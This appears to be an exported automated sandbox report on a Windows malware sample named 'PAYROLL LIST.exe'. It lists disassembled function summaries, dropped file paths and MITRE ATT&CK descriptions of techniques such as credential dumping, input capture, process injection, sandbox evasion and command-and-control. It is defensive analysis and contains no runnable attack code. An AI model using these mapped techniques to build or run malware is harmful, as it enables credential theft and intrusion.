Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 92aa807b65c047ba52a030dcb3a749f0a8f5e4cb3b337788cbdfc6fe2ffe7cde
Instruction ID: bed30e1b5b5b3b2bab895a0a00d125e16092b421d5be3b32b0e421cf30aa7d5e
Opcode Fuzzy Hash: 92aa807b65c047ba52a030dcb3a749f0a8f5e4cb3b337788cbdfc6fe2ffe7cde
Instruction Fuzzy Hash: 9801D471651128ABCB04EBA8DD529FE3379FF56361B04062DF862A72D2EB74590CC7A0

Function 00A5B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 00A5B6EB

Strings

ComboBox, xrefs: 00A5B687
ListBox, xrefs: 00A5B6B5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 6b030aedffab35ec727f5b782aa4fd7f5af3190fe1062e1b76190e5dcaa029c3
Instruction ID: 1ba455dbac84c77c82fb5ae3713b535e260e7be2436aa9e8ee2665a5d11170a2
Opcode Fuzzy Hash: 6b030aedffab35ec727f5b782aa4fd7f5af3190fe1062e1b76190e5dcaa029c3
Instruction Fuzzy Hash: D6018F71641014ABDB04EBA8DA52BFE73A8AB15342B100029B802A7691EBB45E1CC7B5

Function 00A5B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 00A5B76C

Strings

ComboBox, xrefs: 00A5B70A
ListBox, xrefs: 00A5B738

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 39e61c86074c0d6b0f592a6f4cc28d9025a9a912c359e13e3c9eb6caa1184165
Instruction ID: 23a37ae52d255a74c004bff771c922b1b624eef882ec8864e6ccdd55564b1192
Opcode Fuzzy Hash: 39e61c86074c0d6b0f592a6f4cc28d9025a9a912c359e13e3c9eb6caa1184165
Instruction Fuzzy Hash: 8E01D171641114BBDB00EBA8DA02FFE73ACAB19342F100029B802B32D2EB745E0DC7B5

Function 00A67744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00A67762
_wcscmp.LIBCMT ref: 00A67774

Strings

#32770, xrefs: 00A6776E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: c4ceb928020977557c8befba337c5fa489fd04dfb682b5932371e7831e45545f
Instruction ID: a09fa54fd746b337bf754bc242c3efc8ee490852829abe61fdb42f03b60719ca
Opcode Fuzzy Hash: c4ceb928020977557c8befba337c5fa489fd04dfb682b5932371e7831e45545f
Instruction Fuzzy Hash: 85E0927760432527DB10EBE59C49ECBFBACAB91764F000066B905D7181E660E64187D0

Function 00A5A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A5A63F

Part of subcall function 00A413F1: _doexit.LIBCMT ref: 00A413FB

Strings

Error allocating memory., xrefs: 00A5A638
AutoIt, xrefs: 00A5A633

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 11dc5a6b986a4b52a3a87ff9b88b95cf98eea99d3ab07161f277fcc9c0c43ca1
Instruction ID: fe182c7a1e21283d81a54a65229fe5805efda73d36970952d73c6937be29e144
Opcode Fuzzy Hash: 11dc5a6b986a4b52a3a87ff9b88b95cf98eea99d3ab07161f277fcc9c0c43ca1
Instruction Fuzzy Hash: C8D05B313C472837D21476E87D17FC5754CAB15B51F040426FB0D995C25EE6D98042D9

Function 00A9AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00A9ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00A9AEBD

Strings

WIN_XPe, xrefs: 00A9ACD3

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 2e099ebcfe827ffbb954032fd23dda8c3387114b72509e97707005a69843af73
Instruction ID: 6181b89ea257e531d48b28b1da1184342ed05d815d7f884f103882bb27f9f7e4
Opcode Fuzzy Hash: 2e099ebcfe827ffbb954032fd23dda8c3387114b72509e97707005a69843af73
Instruction Fuzzy Hash: 94E03970D00109DFCF11DBE4D984AECFBF8AB68300F108082E042BA560CB304A85DF22

Function 00A88698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A886A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A886B5

Part of subcall function 00A67A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00A67AD0

Strings

Shell_TrayWnd, xrefs: 00A8869B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d4070375b9d69de299051be2df34f298ad66af7a19db012f2e7286b3a7615fde
Instruction ID: 40317b49e483c3ea86f2bfdc05ee9db53c6670ab2fc4f646ba4c98f1612d4104
Opcode Fuzzy Hash: d4070375b9d69de299051be2df34f298ad66af7a19db012f2e7286b3a7615fde
Instruction Fuzzy Hash: 2ED012767A4315BBF668A7B0AC0BFCA7A18AF15B11F100815B78BAA1D0CAE0E941C754

Function 00A886CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A886E2
PostMessageW.USER32(00000000), ref: 00A886E9

Part of subcall function 00A67A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00A67AD0

Strings

Shell_TrayWnd, xrefs: 00A886DB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d670b4f9de80f6e27c6ed6fd133eed703ae26f4ff30036b449295be0b112f645
Instruction ID: ae23749cba480ce4111b1c009002991ce9b4a791b3bd771efc4582b587bcf929
Opcode Fuzzy Hash: d670b4f9de80f6e27c6ed6fd133eed703ae26f4ff30036b449295be0b112f645
Instruction Fuzzy Hash: 35D022323903147BF268A3B0AC0BFCA3A18AB05B10F000805B387EA1C0CAE0E900C714

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PAYROLL LIST.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\FxK39HI69

C:\Users\user\AppData\Local\Temp\aut5312.tmp

C:\Users\user\AppData\Local\Temp\forniciform

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
PAYROLL LIST.exe

Function 00A4B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00A23D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Function 00A3DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 00A2406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00A6FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Function 00A6BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316
fileCOMMON

Function 00A23F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00A23742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00A23E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 00A4ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Function 00BA91D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00A249FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 00A236B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00BA8F70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre